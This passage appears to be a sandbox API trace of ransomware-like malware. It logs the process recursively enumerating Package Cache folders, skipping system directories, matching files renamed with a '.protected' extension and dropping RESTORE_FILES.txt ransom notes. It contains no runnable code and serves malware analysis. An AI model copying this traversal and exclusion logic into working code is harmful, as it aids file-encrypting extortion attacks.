dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.320] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.320] lstrcmpiW (lpString1="Package Cache", lpString2="Windows") returned -1 [0093.320] lstrcmpiW (lpString1="Package Cache", lpString2="Program Files") returned -1 [0093.320] lstrcmpiW (lpString1="Package Cache", lpString2="Program Files (x86)") returned -1 [0093.320] lstrcmpiW (lpString1="Package Cache", lpString2="$Recycle.bin") returned 1 [0093.321] lstrcmpiW (lpString1="Package Cache", lpString2="System Volume Information") returned -1 [0093.321] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache") returned 36 [0093.321] lstrcmpW (lpString1="Package Cache", lpString2=".") returned 1 [0093.321] lstrcmpW (lpString1="Package Cache", lpString2="..") returned 1 [0093.321] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\*") returned 38 [0093.321] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0093.321] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.321] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.321] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.321] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.321] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\.") returned 38 [0093.321] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.321] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.321] 
wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\..") returned 39 [0093.321] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.321] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.321] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.321] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned 77 [0093.321] lstrcmpW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2=".") returned 1 [0093.321] lstrcmpW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="..") returned 1 [0093.321] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*") returned 79 [0093.321] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.322] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\.") returned 79 [0093.322] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.322] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.322] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\..") returned 80 [0093.322] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.322] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.322] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 
[0093.322] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages") returned 86 [0093.322] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.322] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.322] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*") returned 88 [0093.322] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.323] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\.") returned 88 [0093.323] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.323] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.323] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\..") returned 89 [0093.323] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.323] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.323] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.323] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch") returned 92 [0093.323] lstrcmpW (lpString1="Patch", lpString2=".") returned 1 [0093.323] lstrcmpW (lpString1="Patch", lpString2="..") returned 1 [0093.323] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*") returned 94 [0093.323] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.323] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\.") returned 94 [0093.323] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.324] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.324] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\..") returned 95 [0093.324] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.324] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.324] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.324] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\RESTORE_FILES.txt") returned 110 [0093.324] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.324] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.324] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.324] lstrcmpiW (lpString1="x64", lpString2="Windows") returned 1 [0093.324] lstrcmpiW (lpString1="x64", lpString2="Program Files") returned 1 [0093.324] lstrcmpiW (lpString1="x64", lpString2="Program Files (x86)") returned 1 [0093.324] 
lstrcmpiW (lpString1="x64", lpString2="$Recycle.bin") returned 1 [0093.324] lstrcmpiW (lpString1="x64", lpString2="System Volume Information") returned 1 [0093.324] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64") returned 96 [0093.324] lstrcmpW (lpString1="x64", lpString2=".") returned 1 [0093.324] lstrcmpW (lpString1="x64", lpString2="..") returned 1 [0093.324] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*") returned 98 [0093.324] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.324] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.324] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.324] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.324] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.324] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.324] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\.") returned 98 [0093.324] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.324] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.324] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.324] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.325] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.325] lstrcmpiW (lpString1="..", 
lpString2="$Recycle.bin") returned 1 [0093.325] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.325] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\..") returned 99 [0093.325] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.325] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.325] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.325] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\RESTORE_FILES.txt") returned 114 [0093.325] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.325] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.325] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.325] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="Windows") returned 1 [0093.325] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="Program Files") returned 1 [0093.325] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="Program Files (x86)") returned 1 [0093.325] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", 
lpString2="$Recycle.bin") returned 1 [0093.325] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="System Volume Information") returned 1 [0093.325] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.protected") returned 135 [0093.325] StrStrIW (lpFirst="Windows6.1-KB2999226-x64.msu.protected", lpSrch=".protected") returned=".protected" [0093.325] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.325] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.325] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\RESTORE_FILES.txt") returned 114 [0093.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.325] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.325] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.325] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\RESTORE_FILES.txt") returned 110 [0093.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.325] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.326] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.326] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.326] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\RESTORE_FILES.txt") returned 104 [0093.326] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.326] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.326] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.326] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.326] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\RESTORE_FILES.txt") returned 104 [0093.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package 
cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.327] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.327] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.327] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.327] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.327] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.327] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.327] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\RESTORE_FILES.txt") returned 95 [0093.327] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.327] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.327] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.327] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.327] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\RESTORE_FILES.txt") returned 95 [0093.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.328] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.328] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="Windows") returned -1 [0093.328] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="Program Files") returned -1 [0093.328] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="Program Files (x86)") returned -1 [0093.328] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="$Recycle.bin") returned 1 [0093.328] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="System Volume Information") returned -1 [0093.328] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned 77 [0093.328] lstrcmpW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2=".") returned 1 [0093.328] lstrcmpW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="..") returned 1 [0093.328] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*") returned 79 [0093.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.328] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.328] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.328] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.328] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.328] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.328] wnsprintfW (in: 
pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\.") returned 79 [0093.328] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.328] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.328] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.328] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.328] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.328] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.328] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.329] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\..") returned 80 [0093.329] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.329] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.329] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.329] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0093.329] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0093.329] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0093.329] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0093.329] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0093.329] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages") returned 86 [0093.329] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.329] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.329] wnsprintfW (in: pszDest=0x4bfb20, 
cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*") returned 88 [0093.329] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.329] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.329] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.329] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.329] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.329] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.329] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\.") returned 88 [0093.329] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.329] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.330] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.330] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.330] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.330] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.330] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.330] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\..") returned 89 [0093.330] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.330] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.330] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 
[0093.330] lstrcmpiW (lpString1="Patch", lpString2="Windows") returned -1 [0093.330] lstrcmpiW (lpString1="Patch", lpString2="Program Files") returned -1 [0093.330] lstrcmpiW (lpString1="Patch", lpString2="Program Files (x86)") returned -1 [0093.330] lstrcmpiW (lpString1="Patch", lpString2="$Recycle.bin") returned 1 [0093.330] lstrcmpiW (lpString1="Patch", lpString2="System Volume Information") returned -1 [0093.330] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch") returned 92 [0093.330] lstrcmpW (lpString1="Patch", lpString2=".") returned 1 [0093.330] lstrcmpW (lpString1="Patch", lpString2="..") returned 1 [0093.330] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*") returned 94 [0093.330] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.330] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.330] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.330] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.330] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.330] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.330] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\.") returned 94 [0093.330] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.330] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.330] lstrcmpiW 
